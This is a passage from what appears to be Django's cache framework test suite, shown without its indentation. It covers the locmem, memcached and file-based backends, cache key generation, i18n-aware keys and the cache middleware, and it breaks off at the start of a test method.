def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
def test_cache_write_unpicklable_type(self):
# This fails if not using the highest pickling protocol on Python 2.
cache.set('unpicklable', UnpicklableType())
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def text_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
